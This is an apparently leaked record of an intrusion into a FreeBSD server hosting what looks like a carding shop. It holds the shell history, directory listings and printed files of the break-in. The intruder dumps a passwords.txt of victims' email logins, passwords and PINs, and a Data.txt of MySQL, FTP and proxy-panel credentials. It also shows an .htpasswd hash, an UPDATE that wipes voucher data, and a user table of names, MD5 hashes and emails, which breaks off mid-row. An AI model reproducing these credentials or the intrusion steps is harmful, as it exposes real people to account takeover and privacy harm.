:pserver:anoncvs@anoncvs.tw.FreeBSD.org:/home/ncvs lang/php5 +portdowngrade -s :pserver:anoncvs@anoncvs.at.FreeBSD.org:/home/ncvs lang/php5 +portdowngrade -s :pserver:anoncvs.at.FreeBSD.org:/home/ncvs lang/php5 -o anoncvs +portdowngrade -o anoncvs -s :pserver:anoncvs.at.FreeBSD.org:/home/ncvs lang/php5 +portdowngrade -o=anoncvs -s :pserver:anoncvs.at.FreeBSD.org:/home/ncvs lang/php5 +portdowngrade -o anoncvs -s :pserver:anoncvs.at.FreeBSD.org:/home/ncvs lang/php5 +portdowngrade -s :pserver:anoncvs@anoncvs.manov.su:/home/ncvs lang/php5 +portdowngrade -s :pserver:anoncvs@anoncvs.manov.su:/home/ncvs lang/php5 +portdowngrade -s :pserver:anoncvs@anoncvs.manov.su:/home/ncvs lang/php5 +server_args = -f --allow-root=/test pserver +cat /etc/inetd.conf +cat /etc/inetd.conf | grep allow +portdowngrade -s :pserver:anoncvs@cvsup13.tw.freebsd.org:/home/ncvs lang/php5 +portdowngrade -s :pserver:cvsup13.tw.freebsd.org:/home/ncvs lang/php5 +portdowngrade -s :pserver:anoncvs@anoncvs1.FreeBSD.org:/home/ncvs lang/php5 +portdowngrade -s :pserver:anoncvs@cvsup13.fr.freebsd.org:/home/ncvs lang/php5 +mc +php -v | grep imap +php -m | grep imap +portdowngrade -s :pserver:anoncvs@anoncvs1.FreeBSD.org:/home/ncvs lang/php5 +portdowngrade -s :pserver:anoncvs@anoncvs2.FreeBSD.org:/home/ncvs lang/php5 +php -v +portdowngrade lang/php5 +portdowngrade -s :pserver:anoncvs@anoncvs1.FreeBSD.org:/home/ncvs lang/php5 +portdowngrade -s :pserver:anoncvs@anoncvs.at.FreeBSD.org:/home/ncv lang/php5 +portdowngrade -s :pserver:anoncvs@anoncvs.at.FreeBSD.org:/home/ncvs lang/php5 +portdowngrade -s :pserver:anoncvs@anoncvs.de.FreeBSD.org:/home/ncvs lang/php5 +portdowngrade -r -s :pserver:anoncvs@anoncvs.de.FreeBSD.org:/home/ncvs lang/php5 +portdowngrade -s :pserver:anoncvs@anoncvs.de.FreeBSD.org:/home/ncvs lang/php5 +portdowngrade -s :login:anoncvs@anoncvs.jp.FreeBSD.org:/home/ncvs lang/php5 +portdowngrade -s :pserver:anoncvs@anoncvs.jp.FreeBSD.org:/home/ncvs lang/php5 +portdowngrade -s :pserver:anoncvs@anoncvs.jp.FreeBSD.org:/home/ncvs lang/php5 +portdowngrade -s :pserver:anoncvs@anoncvs.jp.FreeBSD.org:/home/ncvs lang/php5 +portdowngrade -s ":pserver:anoncvs@anoncvs.jp.FreeBSD.org:/home/ncvs" lang/php5 +portdowngrade -s ":pserver:anoncvs@anoncvs.fr.FreeBSD.org:/home/ncvs" lang/php5 +portdowngrade -o -s ":pserver:anoncvs@anoncvs.fr.FreeBSD.org:/home/ncvs" lang/php5 +portdowngrade -o -s ":pserver:anoncvs@anoncvs.fr.FreeBSD.org:/home/ncvs" lang/php5 +cd /usr/ports/mail/php5-imap/ +make config +make +cd .. +cd .. +mc +cd distfiles/ +fetch http://downloads.php.net/ilia/php-5.2.5.tar.bz2 +cd .. +cd mail/php5-imap/ +make +make install +php -m +php -m | grep imap +ls /var/db/pkg/| grep extre +ls /var/db/pkg/| grep exte +ls +mc + +# cd /home/mmgen + +total 44 +drwxr-x--- 7 mmgen www 512 Jun 11 13:18 . +drwx--x--x 28 root wheel 1024 Sep 14 17:31 .. +drwxrwx--- 5 mmgen www 512 Jun 11 15:22 dodo.st0re.cc +drwxrwx--- 8 mmgen www 1024 Sep 30 16:19 st0re.cc +drwxrwx--- 3 mmgen www 512 Jan 26 2011 st0re.mmgen.st0re +drwxrwx--- 4 mmgen www 512 Dec 2 2010 st0re.morgen.w2c.ru +drwxrwx--- 2 mmgen www 10240 Oct 1 16:32 temp + +# cd dodo.st0re.cc + +# ls -la +total 96 +drwxrwx--- 5 mmgen www 512 Jun 11 15:22 . +drwxr-x--- 7 mmgen www 512 Jun 11 13:18 .. +drwxr-xr-x 2 mmgen www 512 Jun 11 15:21 css +drwxr-xr-x 4 mmgen www 2048 Jun 11 15:23 images +-rw-r--r-- 1 mmgen www 38106 Jun 11 15:23 index.html +drwxr-xr-x 2 mmgen www 512 Jun 11 15:21 js +# cd .. + +# cd st0re.mmgen.st0re + +# ls -la +total 16 +drwxrwx--- 3 mmgen www 512 Jan 26 2011 . +drwxr-x--- 7 mmgen www 512 Jun 11 13:18 .. +drwxr-xr-x 4 mmgen www 1536 Jan 26 2011 Neues Verzeichnis +-rw-r--r-- 1 mmgen www 1034 Dec 2 2010 index.html + +# cd "Neues Verzeichnis" + +# ls -la +total 237856 +drwxr-xr-x 4 mmgen www 1536 Jan 26 2011 . +drwxrwx--- 3 mmgen www 512 Jan 26 2011 .. +-rw-r--r-- 1 mmgen www 12326 Jan 26 2011 2.pl +-rw-r--r-- 1 mmgen www 3790 Jan 26 2011 2.png +-rw-r--r-- 1 mmgen www 697711 Jan 26 2011 22.png +-rw-r--r-- 1 mmgen www 164 Jan 26 2011 280539654158.kwm +-rw-r--r-- 1 mmgen www 1608 Jan 26 2011 280539654158.pwm +-rw-r--r-- 1 mmgen www 40882 Jan 26 2011 4.jpg +-rw-r--r-- 1 mmgen www 40505 Jan 26 2011 Banner4.jpg +-rw-r--r-- 1 mmgen www 1280 Jan 26 2011 Command Prompt.lnk +-rw-r--r-- 1 mmgen www 231 Jan 26 2011 Data.txt +-rw-r--r-- 1 mmgen www 900 Jan 26 2011 Daten.rtf +-rw-r--r-- 1 mmgen www 661429 Jan 26 2011 Enterpage.png +-rw-r--r-- 1 mmgen www 126738 Jan 26 2011 Enterpage_for_gamekings_eu_by_Frizzl3.jpg +-rw-r--r-- 1 mmgen www 1616155 Jan 26 2011 FILE0009.rar +-rw-r--r-- 1 mmgen www 952 Jan 26 2011 Fake Webcam (No Preview Mode).lnk +-rw-r--r-- 1 mmgen www 942 Jan 26 2011 Fake Webcam.lnk +-rw-r--r-- 1 mmgen www 1950 Jan 26 2011 FileZilla Client.lnk +-rw-r--r-- 1 mmgen www 1192 Jan 26 2011 Foxit Reader.lnk +-rw-r--r-- 1 mmgen www 10374720 Jan 26 2011 MasterCard-Abrechnung.psd +-rw-r--r-- 1 mmgen www 1889 Jan 26 2011 Mozilla Firefox.lnk +-rw-r--r-- 1 mmgen www 22207 Jan 26 2011 Neues Textdokument.txt +-rw-r--r-- 1 mmgen www 137 Jan 26 2011 PSN2.txt +drwxr-xr-x 2 mmgen www 512 Jan 26 2011 Pack_Pixel_Arrows_01 +drwxr-xr-x 2 mmgen www 512 Jan 26 2011 Packstation +-rw-r--r-- 1 mmgen www 38207488 Jan 26 2011 PhotoshopCS4Portable.rar +-rw-r--r-- 1 mmgen www 1139 Jan 26 2011 SQLRIP.lnk +-rw-r--r-- 1 mmgen www 1884 Jan 26 2011 SendBlaster.lnk +-rw-r--r-- 1 mmgen www 2505 Jan 26 2011 Skype.lnk +-rw-r--r-- 1 mmgen www 318050 Jan 26 2011 St0re.jpg +-rw-r--r-- 1 mmgen www 4574766 Jan 26 2011 St0re.psd +-rw-r--r-- 1 mmgen www 679964 Jan 26 2011 St0re2.jpg +-rw-r--r-- 1 mmgen www 24560317 Jan 26 2011 St0reinfo - Shopdesign2.psd +-rw-r--r-- 1 mmgen www 1124 Jan 26 2011 TeamViewer 6.lnk +-rw-r--r-- 1 mmgen www 917 Jan 26 2011 WebMoney Keeper Classic 3.9.3.1.lnk +-rw-r--r-- 1 mmgen www 40467 Jan 26 2011 Werbung.png +-rw-r--r-- 1 mmgen www 3821 Jan 26 2011 btn2.png +-rw-r--r-- 1 mmgen www 68286 Jan 26 2011 btn2.psd +-rw-r--r-- 1 mmgen www 748437 Jan 26 2011 exported data.txt +-rw-r--r-- 1 mmgen www 1179 Jan 26 2011 head.gif +-rw-r--r-- 1 mmgen www 1789314 Jan 26 2011 head.psd +-rw-r--r-- 1 mmgen www 2084608 Jan 26 2011 hinten.png +-rw-r--r-- 1 mmgen www 791 Jan 26 2011 new 2.txt +-rw-r--r-- 1 mmgen www 1133 Jan 26 2011 new 5.txt +-rw-r--r-- 1 mmgen www 528 Jan 26 2011 new 9.txt +-rw-r--r-- 1 mmgen www 3318 Jan 26 2011 passwords.txt +-rw-r--r-- 1 mmgen www 145044 Jan 26 2011 pp.rar +-rw-r--r-- 1 mmgen www 31694808 Jan 26 2011 setup.exe +-rw-r--r-- 1 mmgen www 353781 Jan 26 2011 store.rar +-rw-r--r-- 1 mmgen www 74196 Jan 26 2011 title.gif +-rw-r--r-- 1 mmgen www 76765 Jan 26 2011 title_unreg.gif +-rw-r--r-- 1 mmgen www 2286399 Jan 26 2011 vorne.png +-rw-r--r-- 1 mmgen www 1087 Jan 26 2011 wrub4sts.lnk +# + +# cat passwords.txt +j_username=sny@vtxmail.ch +j_password=tino55 +pin=tino55 + +j_username=office@vertec-systems.com +j_password=121066 +pin= + + + + +j_username=DeineMutter@fickich.net +j_password=Diehuredie +pin=1234dudummestier + +j_username=HeyduFotze@magdich.net +j_password=ArschPo +pin=verarschmichnicht + +j_username=mybigmouth@web.de +j_password=andrea +pin=1950 + +j_username= +j_password= +pin= + +j_username=Rainer.Keberle@online.de +j_password=finepix4700 +pin= + +j_username=1746378 +j_password= +pin=q206mitte + + + +j_username=1746378 +j_password= +pin=q206mitte + +j_username=2187452 +j_password= +pin=q206mitte + +j_username=rababa@whitehouse.gov +j_password=dollar +pin=4711 + + + + +j_username=170734837 +j_password=express12 +pin= + +j_username=office@otto-stoeckl.com +j_password= +pin= + +j_username=170734837 +j_password=express +pin=12 + +j_username=nicole.dargel@gmx.de +j_password=Diving66 +pin= + +j_username=claudia.schultz@shell.com +j_password=chris1 +pin=4449 + +j_username=claudia.schultz@shell.com +j_password=chris1 +pin=4449 + +j_username=claudia.schultz@shell.com +j_password=chris1 +pin= + +j_username=734093 +j_password=19birgit +pin=7578 + +j_username=734093 +j_password=19nadine +pin=7578 + +j_username=734093 +j_password=birgit +pin=7578 + + + +j_username=sabina.mastrogiovanni@gmx.de +j_password=2dU8yU9qY4aC +pin=5942 + +j_username=sabina.mastrogiovanni@gmx.de +j_password=2dU8yU9qY4aC +pin=5942 + +j_username=Heldmann_C@web.de +j_password= +pin=6237 + +j_username=Heldmann_C@web.de +j_password= +pin=6237 + +j_username=benjamin.egermann@gmail.com +j_password=pcarmy +pin=6039 + +j_username=sabina.mastrogiovanni@gmx.de +j_password=2dU8yU9qY4aC +pin=5942 + +j_username= +j_password= +pin= + +j_username=danisahne8283@aol.com +j_password= +pin=masenfan + + +j_username=danisahne8282@aol.com +j_password=masenfan +pin=5556 + +j_username=danisahne8283@aol.com +j_password= +pin= + +j_username=danisahne8283@aol.com +j_password=masenfan +pin= + +j_username= +j_password= +pin= + +j_username= +j_password= +pin= + +j_username= +j_password= +pin= + +j_username= +j_password= +pin= + +j_username= +j_password= +pin= + +j_username= +j_password= +pin= + +j_username= +j_password= +pin= + +j_username= +j_password= +pin= + +j_username= +j_password= +pin= + +j_username= +j_password= +pin= + +j_username= +j_password= +pin= + +j_username= +j_password= +pin= + +j_username= +j_password= +pin= + +j_username= +j_password= +pin= + +j_username= +j_password= +pin= + +j_username= +j_password= +pin= + +j_username= +j_password= +pin= + +j_username= +j_password= +pin= + +j_username= +j_password= +pin= + +j_username= +j_password= +pin= + +j_username= +j_password= +pin= + +j_username= +j_password= +pin= + +j_username= +j_password= +pin= + +j_username= +j_password= +pin= + +j_username= +j_password= +pin= + +j_username= +j_password= +pin= + +j_username= +j_password= +pin= + +j_username= +j_password= +pin= + +j_username= +j_password= +pin= + +j_username= +j_password= +pin= + +j_username= +j_password= +pin= + + +j_username=hannesvw@gmail.com +j_password= +pin=9016 + + + + +j_username=Thomas.Wunder@hv-s.de +j_password=Mannheim +pin= + + +j_username=mail@obu-hamburg.de +j_password=obu2009 +pin= + +j_username=mail@obu-hamburg.de +j_password=2493 +pin= + +j_username=mail@obu-hamburg.de +j_password=OBU2009 +pin= + +j_username=31971258 +j_password= +pin=2493 + + + + + +j_username=mario.hoefler@web.de +j_password=nutpen10 +pin= + +j_username=E.Giegler@web.de +j_password=Eschen +pin=5115 + +j_username=E.Giegler@web.de +j_password=Eschen +pin=5115 + + +j_username=mail@obu-hamburg.de +j_password=obu2009 +pin=2394 + +# cat Data.txt +MySQL +https://91.213.8.13/myadmin/ +$host = localhost +$user = Palshop +$pass = u5AunWox +$data = morgen_Palshop + +FTP: +91.213.8.26 +morgen +2Rysb2Kv + +5socks +http://admin.5socks.net/ +Morgen +Kzmv7QkvIf + + +0458-8466-1325-4447 UVszBT <<<< 50?# + +# cd .. + +# cd .. + +# cd st0re.morgen.w2c.ru + +# ls -la +total 16 +drwxrwx--- 4 mmgen www 512 Dec 2 2010 . +drwxr-x--- 7 mmgen www 512 Jun 11 13:18 .. +drwxr-xr-x 5 mmgen www 512 Dec 2 2010 admin +drwxr-xr-x 8 mmgen www 512 Dec 3 2010 content + +# cd admin + +# ls -la +total 56 +drwxr-xr-x 5 mmgen www 512 Dec 2 2010 . +drwxrwx--- 4 mmgen www 512 Dec 2 2010 .. +-rw-r--r-- 1 mmgen www 8621 Dec 2 2010 DE.lng +-rw-r--r-- 1 mmgen www 1546 Dec 2 2010 admin.php +-rw-r--r-- 1 mmgen www 708 Dec 3 2010 config.php +drwxr-xr-x 3 mmgen www 512 Dec 2 2010 designe +-rw-r--r-- 1 mmgen www 1008 Dec 2 2010 functions.php +drwxr-xr-x 4 mmgen www 512 Dec 2 2010 img +-rw-r--r-- 1 mmgen www 876 Dec 3 2010 index.php +drwxr-xr-x 2 mmgen www 512 Dec 2 2010 pages + +# cat config.php + + +# cd /home/mmgen/st0re.cc + +# ls -la +total 1522696 +drwxrwx--- 8 mmgen www 1024 Sep 30 16:19 . +drwxr-x--- 7 mmgen www 512 Jun 11 13:18 .. +-rw-r--r-- 1 mmgen www 16950051 Sep 13 01:08 1.mp3 +-rw-r--r-- 1 mmgen www 941752 Sep 30 16:19 2.rar +-rw-r--r-- 1 mmgen www 144694 Jan 30 2011 3.jpeg +-rw-r--r-- 1 mmgen www 760708777 Sep 13 00:58 4.rar +-rw-r--r-- 1 mmgen www 30654 Feb 22 2011 Banner.jpg +-rw-r--r-- 1 mmgen www 40505 Feb 7 2011 Banner4.jpg +-rw-r--r-- 1 mmgen www 13347 Feb 3 2011 Jelly.jpg +-rw-r--r-- 1 mmgen www 53943 Feb 3 2011 Kamagra.png +drwxr-xr-x 3 mmgen www 512 Feb 21 2011 Neu +drwxr-xr-x 3 mmgen www 512 Jun 2 18:52 Ref +-rw-r--r-- 1 mmgen www 8967 Jul 17 16:04 Ukash.php +-rw-r--r-- 1 mmgen www 4756 Jan 27 2011 account.php +-rw-r--r-- 1 mmgen www 1532 Jan 27 2011 account_do.php +-rw-r--r-- 1 mmgen www 978 Jan 27 2011 add_basket.php +drwxr-xr-x 7 mmgen www 512 Mar 10 2011 admin +-rw-r--r-- 1 mmgen www 164100 Apr 10 16:10 banner.gif +-rw-r--r-- 1 mmgen www 2398 Jan 28 2011 basket.php +-rw-r--r-- 1 mmgen www 11921 Jul 21 23:44 cashin.php +-rw-r--r-- 1 mmgen www 2278 Apr 9 18:00 category.php +-rw-r--r-- 1 mmgen www 5223 Mar 10 2011 cc_modul.php +-rw-r--r-- 1 mmgen www 2265 Feb 8 2011 checkout.php +-rw-r--r-- 1 mmgen www 1471 Jan 27 2011 error.php +-rw-r--r-- 1 mmgen www 1007 Jan 27 2011 faq.php +-rw-r--r-- 1 mmgen www 1406 Apr 18 12:49 favicon.ico +-rw-r--r-- 1 mmgen www 17594 Jan 27 2011 head.png +drwxr-xr-x 2 mmgen www 512 Aug 21 22:23 ico +-rw-r--r-- 1 mmgen www 7623 Jun 2 19:58 index.php +drwxr-xr-x 2 mmgen www 512 Apr 8 17:22 libs +-rw-r--r-- 1 mmgen www 886 Jan 27 2011 login.php +-rw-r--r-- 1 mmgen www 1177 Jan 27 2011 login_do.php +-rw-r--r-- 1 mmgen www 164 Jan 27 2011 logout.php +-rw-r--r-- 1 mmgen www 1879 Jan 27 2011 product.php +-rw-r--r-- 1 mmgen www 1319 Jan 27 2011 register.php +-rw-r--r-- 1 mmgen www 1827 Jan 27 2011 register_do.php +drwxr-xr-x 3 mmgen www 512 May 17 03:21 style +-rw-r--r-- 1 mmgen www 8011 Apr 13 21:31 support.php +-rw-r--r-- 1 mmgen www 2417 Apr 13 21:31 support_do.php + +# cd admin + +# ls -la +total 268 +drwxr-xr-x 7 mmgen www 512 Mar 10 2011 . +drwxrwx--- 8 mmgen www 1024 Sep 30 16:19 .. +-rw-r--r-- 1 mmgen www 106 May 17 13:31 .htaccess +-rw-r--r-- 1 mmgen www 40 Jun 2 18:50 .htpasswd +-rw-r--r-- 1 mmgen www 8372 Feb 8 2011 category.php +drwxr-xr-x 2 mmgen www 512 Feb 8 2011 css +-rw-r--r-- 1 mmgen www 4599 Jan 27 2011 faq.php +drwxr-xr-x 6 mmgen www 512 Feb 8 2011 images +-rw-r--r-- 1 mmgen www 14618 Mar 10 2011 index.php +-rw-r--r-- 1 mmgen www 8549 Feb 13 2011 items.php +drwxr-xr-x 7 mmgen www 512 Feb 8 2011 js +drwxr-xr-x 3 mmgen www 512 Jan 27 2011 libs +-rw-r--r-- 1 mmgen www 7359 Mar 10 2011 modul.php +-rw-r--r-- 1 mmgen www 9007 Feb 8 2011 news.php +-rw-r--r-- 1 mmgen www 1256 Jan 27 2011 option.php +-rw-r--r-- 1 mmgen www 11703 Feb 8 2011 product.php +drwxr-xr-x 3 mmgen www 512 Jan 27 2011 style +-rw-r--r-- 1 mmgen www 18 Jan 29 2011 test.php +-rw-r--r-- 1 mmgen www 10040 Apr 9 19:18 tickets.php +-rw-r--r-- 1 mmgen www 12164 Feb 8 2011 user.php +-rw-r--r-- 1 mmgen www 17532 Feb 8 2011 voucher.php + +# cat .htaccess +AuthType Basic +AuthName "FUCK YOU" +AuthUserFile /home/mmgen/st0re.cc/admin/.htpasswd +Require valid-user + +# cat .htpasswd +Admin:$1$5KnX9ENu$aKqzHTLd5HpMqKqgnglUx/ + +# cd .. + +# cd libs + +# ls -la +total 56 +drwxr-xr-x 2 mmgen www 512 Apr 8 17:22 . +drwxrwx--- 8 mmgen www 1024 Sep 30 16:19 .. +-rw-r--r-- 1 mmgen www 2757 Jan 27 2011 class_bbcode.php +-rw-r--r-- 1 mmgen www 1561 Jan 28 2011 class_user.php +-rw-r--r-- 1 mmgen www 227 Jun 2 18:20 mysql_config.php +-rw-r--r-- 1 mmgen www 1312 Apr 11 00:18 psc_cashin.class.php +-rw-r--r-- 1 mmgen www 4383 Jul 19 21:35 ukash_cashin.class.php +-rw-r--r-- 1 mmgen www 7679 Apr 8 17:21 xxx_psc_cashin.class.php +# cat mysql_config.php + + +So let's check out their SHOP DB + +# mysql -u mmgen_shop -D mmgen_shop -p +Enter password: +Reading table information for completion of table and column names +You can turn off this feature to get a quicker startup with -A + +Welcome to the MySQL monitor. Commands end with ; or \g. +Your MySQL connection id is 89332 +Server version: 5.0.51a-log FreeBSD port: mysql-server-5.0.51a + +Type 'help;' or '\h' for help. Type '\c' to clear the buffer. + +mysql> SHOW DATABASES; ++--------------------+ +| Database | ++--------------------+ +| information_schema | +| mmgen_shop | +| test | ++--------------------+ +3 rows in set (0.00 sec) + +mysql> SHOW TABLES; ++----------------------+ +| Tables_in_mmgen_shop | ++----------------------+ +| shop_basket | +| shop_ccmodul | +| shop_coupon | +| shop_faq | +| shop_items | +| shop_navigation | +| shop_news | +| shop_options | +| shop_orders | +| shop_products | +| shop_tickets | +| shop_user | +| shop_voucher | ++----------------------+ +13 rows in set (0.00 sec) + +mysql> # LOLOLO let's rm password info +mysql> UPDATE shop_voucher SET infos = ""; +Query OK, 11 rows affected (0.00 sec) +Rows matched: 11 Changed: 11 Warnings: 0 + +mysql> SELECT * FROM shop_voucher; ++-------+--------+------+---------------------+-------+-------+------------+ +| payid | userid | type | code | infos | value | date | ++-------+--------+------+---------------------+-------+-------+------------+ +| 1872 | 10522 | 1 | 0905-1066-3280-8205 | | 10 | 2011-09-30 | +| 1873 | 10522 | 1 | 0747-8763-8777-7583 | | 10 | 2011-09-30 | +| 1874 | 10482 | 1 | 0170-8844-2643-6121 | | 10 | 2011-09-30 | +| 1875 | 10161 | 1 | 0662-3887-5897-6736 | | 21 | 2011-09-30 | +| 1877 | 8885 | 1 | 0795-2181-5472-4078 | | 10 | 2011-09-30 | +| 1878 | 10575 | 1 | 0508-5218-3536-7066 | | 10 | 2011-09-30 | +| 1869 | 10568 | 1 | 0725-8889-7048-6149 | | 10 | 2011-09-30 | +| 1870 | 10300 | 1 | 0677-5871-1938-8696 | | 10 | 2011-09-30 | +| 1871 | 10557 | 1 | 0570-2670-2925-4453 | | 100 | 2011-09-30 | +| 1402 | 5356 | 0 | | | 0 | 2011-07-21 | +| 1403 | 9652 | 0 | | | 0 | 2011-07-21 | ++-------+--------+------+---------------------+-------+-------+------------+ +11 rows in set (0.00 sec) + +mysql> # Now how about we check who actually buys shit +mysql> SELECT * FROM shop_user WHERE credits > 5; ++--------+---------------+----------------------------------+--------------+---------+--------+---+ +| userid | username | password | icq | credits | status | x | ++--------+---------------+----------------------------------+--------------+---------+--------+---+ +| 6 | J0hn.X3r | dbd570d9cfb7ee0473a7890e641a1f45 | 898437 | 20 | 0 | 0 | +| 189 | Arma | 93f5d2a618cde4160d3eb8f748221f91 | arma@hush.ai | 10 | 0 | 0 | +| 208 | iron.t | 9b630edecc947a5f9e5d4ca59462663f | iron.t@hotbo | 15 | 0 | 0 | +| 514 | ngized | 3dcbb61d6599e4cbe89510c28f324f66 | camora18@web | 10 | 0 | 0 | +| 571 | basha | 1618a9fe1c58f2bedd2fdccefaa6da21 | basha444@web | 9 | 0 | 0 | +| 625 | stefgexp | 55132608a2fb68816bcd3d1caeafc933 | c.k.007@web. | 40 | 0 | 0 | +| 794 | Tanoths | b5042eac66b4bdb8c6e42560f964ed3c | max@lilium-n | 23 | 0 | 0 | +| 804 | TB4ever | 4be5ce67d73fb9b6dda4d91d45387d16 | jjstyler@liv | 7 | 0 | 0 | +| 945 | Sven | 3dd19f98fd4adb12e6cee669341381aa | vb-sveiven@w | 10 | 0 | 0 | +| 973 | binglly | 1a7384005bd77b151e11d58ac79da095 | binglly@web. | 10 | 0 | 0 | +| 1120 | etrax | 4f0cb9262f0a0fdab6c9db4c122024c2 | etrax@secure | 10 | 0 | 0 | +| 1174 | JUMPhil | 40d914022aca12c372304e1cf2e89b88 | 836499 | 9 | 0 | 0 | +| 1195 | m0rpheus | 06aa90cb7e31b1de837cdfd4b837163c | m0rpheusz@o2 | 10 | 0 | 0 | +| 1207 | HansMeier | 44354626326b1cd44cce845e8393ac0d | hansmeierfor | 6 | 0 | 0 | +| 1353 | dr.mouse | b5ba41ed05b0b197546e2a4283af77ae | gucci23@hush | 7 | 0 | 0 | +| 1691 | play | 0c2192030b08d26b06b073eef083548a | b4252353@ugg | 17 | 0 | 0 | +| 1771 | fros | e0e93346794bf614a1f02254d9d8b21e | ritho.ritho@ | 10 | 0 | 0 | +| 1810 | melvyn10 | 41df744f22aa3d7f81983a77e2899829 | melvyn10@081 | 15 | 0 | 0 | +| 1941 | phyntox | 33d42d1eb34ec443704571b0ce34193e | phyntox@goog | 10 | 0 | 0 | +| 1967 | fatal | 592b36d730c592cce0eebe1731d143ec | fatal3x@live | 7 | 0 | 0 | +| 2010 | Dodo | d6d963cedb8dbc1ee57f271e942fbadd | bennibluemch | 7 | 0 | 0 | +| 2301 | Blizzardo | 15b29ffdce66e10527a65bc6d71ad94d | blizzardfert | 10 | 0 | 0 | +| 2415 | ecstasy | 887e1733037e9af10502b8bf923ad202 | Riehm93@onli | 6 | 0 | 0 | +| 2478 | basics | cf7303a964a1682deeb3db90fbe3aeab | admin@mail-s | 6 | 0 | 0 | +| 2630 | Stehlampe | db1527f7ecd3dd38f5de94e38cae2c53 | waswillstdud | 20 | 0 | 0 | +| 2641 | mettwurst | 245a93ee61572bdda20c145374192603 | mettwurst@sa | 8 | 0 | 0 | +| 2677 | Syntax | 068d03ef735f14d75cd78d0ad5e427a3 | psych0tik@li | 13 | 0 | | +| 2696 | seife123 | a2327b1893edf0719cc1f29b8d807957 | azzzze@yahoo | 10 | 0 | 0 | +| 2703 | fam0us | 8f036369a5cd26454949e594fb9e0a2d | ifam0us@hotm | 20 | 0 | 0 | +| 2731 | Borni81 | 8d8e4a0f1607ecb8790bce4d03331749 | bornito@live | 6 | 0 | 0 | +| 2763 | termi | 573bd983f1a92bb6cf8b535919e3a728 | Hans.olaf1@w | 6 | 0 | 0 | +| 2827 | O.M.A. | 6b8d556a2c4e1a17c57c4019d58377f7 | Mueller_Simo | 7 | 0 | 0 | +| 2861 | Epicfisch | 5785adb4d56e4dd0e2732c26ccc3a0ca | admin@stream | 10 | 0 | 0 | +| 2960 | daunilein | 0e1ffc254643ad1b3a006a347146282f | downi@downi. | 6 | 0 | 0 | +| 3101 | Pr3dator | 65a5a3d88782ceb6af221234670ec8fb | christian.ri | 13 | 0 | 0 | +| 3135 | hassan3 | 8ce4ffbdd4b371c255be75734f26cd72 | guzter@ahoo. | 10 | 0 | 0 | +| 3208 | maddox | 4a3ef4824d67af46ea57a39b72dea7df | a3351613@owl | 8 | 0 | 0 | +| 3256 | k00ky | 649f7f3295eb1163604ce906b6a6c498 | k00ky@hotmai | 9 | 0 | 0 | +| 3266 | 1337man | f29f5f0849fec2e6bc1c10de788410fa | roflfastlola | 11 | 0 | 0 | +| 3321 | djinns | c316236440037c0a621d592222708b72 | djinnsrs@goo | 8 | 0 | 0 | +| 3433 | fluxay | 64d1f88b9b276aece4b0edcc25b7a434 | dir@mailinat | 70 | 0 | 0 | +| 3628 | BOMBER | 8e26756ab1075b72dd82965c3d67c162 | bersch5555@w | 6 | 0 | 0 | +| 3731 | testuser0 | 68b62823ed173ad3bed0ce700d556b2a | b999347@owlp | 25 | 0 | 0 | +| 3829 | Skywalker | 077efa5fc07874cb04bd359845314743 | b1459562@owl | 10 | 0 | 0 | +| 3905 | Plasmasmog | ba9912907e468a911de722cd811b99b2 | Plasmasmog@m | 10 | 0 | 0 | +| 3951 | master1234 | bffdd53cd1557a14c84b6f42f2012187 | forfreemovie | 10 | 0 | 0 | +| 4038 | !XSS | 5b84d7e9450f523d263a1e2844d333da | xss-xss@Safe | 17 | 0 | 0 | +| 4114 | sh0x | 7e573aedbe6d321228de54fcacee7ebd | leandroking@ | 6 | 0 | 0 | +| 4121 | slice | c53c7a272390264c5e6beddcc410daa5 | esel@yahoo.d | 10 | 0 | 0 | +| 4140 | Dennske | f8eb6ce796e56b0260d9e77c6e057a20 | wccrew@web.d | 10 | 0 | 0 | +| 4144 | -Bounter- | 2fec358d161f20e1d51e24641d76312f | dreamy@warez | 10 | 0 | 0 | +| 4470 | Phantonym | 95abaa72bd229ec8f058519bb4bcfe87 | Phantonym@hu | 11 | 0 | 0 | +| 4474 | CyberTT | df53ca268240ca76670c8566ee54568a | a1679852@bof | 6 | 0 | 0 | +| 4476 | Getter | 530ea1472e71035353d32d341ecf6343 | a1682682@bof | 50 | 0 | 0 | +| 4808 | ceres2 | dd4df322be3679fc422ab3d45fc97e96 | ceres@imails | 13 | 0 | 0 | +| 4846 | check | 3756dd32ed2706bb3b6fc004b0e4ef80 | senmobiles@h | 8 | 0 | 0 | +| 4890 | lgdavid | 5daec48bdfda7423e079b99c80c13ed1 | david.wang20 | 7 | 0 | 0 | +| 4919 | stronger87 | ea110dfdeb4b966c81f7d786df7b1192 | dirkbischof@ | 10 | 0 | 0 | +| 4944 | burberry | 55f9c405bd87ba23896f34011ffce8da | burberry1337 | 6 | 0 | 0 | +| 5088 | L4x1337 | 7518f76db987755dbb01c52e177ba134 | 591238155 | 8 | 0 | 0 | +| 5126 | Neon | ab64f71b84891bc31fe85512d35716a8 | neon19881@we | 10 | 0 | 0 | +| 5401 | schlecker | cf14f069b4e041d13f50361dd54b9a33 | sjsj@web.de | 8 | 0 | 0 | +| 5446 | sexy1337 | e10adc3949ba59abbe56e057f20f883e | sadsadasdmer | 9 | 0 | 0 | +| 5642 | firelabs | 076c91ca1a80a49970a3e094ef5954cf | fuckthatbitc | 10 | 0 | 0 | +| 5727 | 2t-power | 0df174153bd462f50c728006d9d1c704 | eiermann@hus | 6 | 0 | 0 | +| 6079 | pete | 620209aea87f7bae2bd2445d094ba275 | karl-otto3@w | 20 | 0 | 0 | +| 6092 | accored | bc47508edab07c1a0082c714fdc08eab | acc0r3d@yaho | 18 | 0 | 0 | +| 6167 | mercury | 98169b656c826331d6e9d5e334ca7be8 | fakemail@bla | 10 | 0 | 0 | +| 6183 | Roxas | d412a68fd7624bfe220f55f53c26f5a7 | Roxas_1991@g | 20 | 0 | 0 | +| 6187 | Redbullfly | 3a82ca9ca9bfe5db9d9eda406c13ac61 | Redbullfly@g | 8 | 0 | 0 | +| 6263 | Madd1n | e2a2a6d692a27773a9da52f7e82cfde7 | martinkieser | 6 | 0 | 0 | +| 6465 | terror | 9a1b0d5d2d14b7272183d51fe5914f25 | b1245111@lhs | 12 | 0 | 0 | +| 6549 | drupp | e19d5cd5af0378da05f63f891c7467af | drupp88@goog | 53 | 0 | 0 | +| 6590 | _wayne | dc8996397be86e49cb56fd6face00c7f | mkoch@live.d | 6 | 0 | 0 | +| 6667 | krillewurm | 06e0274429fc435c0335237c0006f13c | easy-riderz@ | 25 | 0 | 0 | +| 6689 | sundy | 263f55f9f491876ebe21af13c2ee4589 | ra.klaus.sta | 7 | 0 | 0 | +| 6772 | 1311 